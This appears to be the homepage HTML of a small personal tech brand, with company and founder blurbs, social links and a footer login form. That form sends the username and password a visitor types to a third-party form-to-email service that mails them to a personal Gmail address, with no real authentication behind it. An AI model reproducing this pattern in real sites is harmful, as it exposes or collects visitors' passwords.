<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description"
        content="El Khaled Tech - Official website of Khaled Mousa. Specialized in technology, information, and modern web solutions.">
    <meta name="keywords"
        content="El Khaled Tech, Khaled Mousa, technology, web development, information technology, official website">
    <meta name="author" content="Khaled Mousa">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>El Khaled Tech - Technology & Information اجهزة كمبيوتر - لابتوب - برمجه - كورسات برمجه- labtob- compoter-
        الخالد تك</title>
    <link rel="stylesheet" href="styles.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap"
        rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
</head>

<body>
    <!-- Header Section -->
    <header class="header">
        <div class="container">
            <div class="header-content">
                <h1 class="company-name">El Khaled Tech</h1>
                <p class="subtitle">Technology & Information</p>
            </div>
        </div>
    </header>

    <!-- About Company Section -->
    <section class="about-company">
        <div class="container">
            <h2 class="section-title">About Our Company</h2>
            <div class="about-content">
                <p>El Khaled Tech is a digital innovation hub dedicated to providing cutting-edge solutions and services
                    to both individuals and businesses. We specialize in delivering technology-driven solutions that
                    empower our clients to thrive in the digital age. Our team of experts combines technical expertise
                    with creative thinking to develop innovative solutions that address real-world challenges.</p>
            </div>
        </div>
    </section>

    <!-- About Founder Section -->
    <section class="about-founder">
        <div class="container">
            <h2 class="section-title"> About the Founder</h2>
            <div class="founder-content">
                <div class="founder-image">
                    <img src="IMG-20240920-WA0044.jpg" alt="Khaled Mousa" class="profile-img">
                </div>
                <div class="founder-info">
                    <h3>Khaled Mousa</h3>
                    <p>Meet Khaled,A passionate tech
                        enthusiast with an insatiable curiosity for technology and knowledge, Khaled founded El Khaled
                        Tech with a vision to bridge the gap between technology and everyday life. His journey in the
                        tech world began with a simple love for computers and has evolved into a mission to make
                        technology accessible and beneficial for everyone.</p>
                </div>
            </div>
        </div>
    </section>

    <!-- Interactive Section -->
    <section class="interactive">
        <div class="container">
            <h2 class="section-title">Welcome Message</h2>
            <div class="interactive-content">
                <button id="welcomeBtn" class="btn">Click for Welcome Message</button>
                <div id="welcomeMessage" class="welcome-message"></div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer class="footer">
        <div class="container">
            <div class="footer-content">
                <p>&copy; 2025 El Khaled Tech. All rights reserved.</p>
                <div class="social-links">
                    <a href="https://www.facebook.com/share/1CPGJYCHgE/" class="social-link" target="_blank"><i
                            class="fab fa-facebook"></i></a>
                    <a href="https://x.com/khaledMous65?t=o8krRYsgWNbDhTic-wLVSw&s=09" target="_blank"
                        class="social-link"><i class="fab fa-twitter"></i></a>
                    <a href="https://www.linkedin.com/in/%D8%AE%D8%A7%D9%84%D8%AF-%D9%85%D9%88%D8%B3%D9%89-a2817a334/"
                        target="_blank" class="social-link"><i class="fab fa-linkedin"></i></a>
                    <a href="https://github.com/khaledmousa2005" target="_blank" class="social-link"><i
                            class="fab fa-github"></i></a>
                    <a href="https://www.youtube.com/@eng_Khaled_Mousa" target="_blank" class="social-link"><i
                            class="fab fa-youtube"></i></a>
                </div>
            </div>
        </div>
        <section class="login-container">
            <h2 class="log">Login to El Khaled Tech</h2>
            <form action="https://formsubmit.co/khaledmousaawwe@gmail.com" method="POST">
                <input type="text" name="username" placeholder="Username" required>
                <input type="password" name="password" placeholder="Password" required>
                <button type="submit">Login</button>
            </form>
        </section>
    </footer>
    <script src="script.js"></script>
</body>

</html>